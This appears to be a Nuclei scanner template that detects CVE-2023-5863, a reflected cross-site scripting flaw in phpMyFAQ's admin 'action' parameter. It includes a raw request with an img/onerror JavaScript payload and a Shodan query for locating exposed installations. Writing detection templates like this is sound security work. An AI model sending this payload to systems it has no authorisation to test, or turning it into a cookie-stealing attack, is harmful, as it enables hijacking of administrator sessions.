id: CVE-2023-5863

info:
  name: phpMyFAQ < 3.2.0 - Cross-site Scripting
  author: ctflearner
  severity: medium
  description: |
    Cross-site Scripting (XSS) Reflected in GitHub repository thorsten/phpmyfaq prior to 3.2.2.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript via reflected XSS in the action parameter, potentially stealing administrator session cookies or performing administrative actions.
  remediation: |
    Update phpMyFAQ to version 3.2.2 or later.
  reference:
    - https://huntr.com/bounties/fbfd4e84-61fb-4063-8f11-15877b8c1f6f
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5863
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-5863
    cwe-id: CWE-79
    epss-score: 0.06224
    epss-percentile: 0.91033
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"phpmyfaq"
    product: phpMyFAQ
  tags: cve2023,cve,huntr,phpmyfaq,xss,vuln

http:
  - raw:
      - |
        GET /admin/index.php?action=ngductung"><img+src/onerror="alert(document.domain) HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src/onerror="alert(document.domain)">'
          - 'phpMyFAQ'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022066bfb65868fe5482dcd1c5f9e0eb17684870068b47140372f0239d30bf0dfcfd022100be4e99d93cad317f5ce80baf995521175fda2c7168b7f0ddd700d1c6702558c6:922c64590222798bb761d5b6d8e72950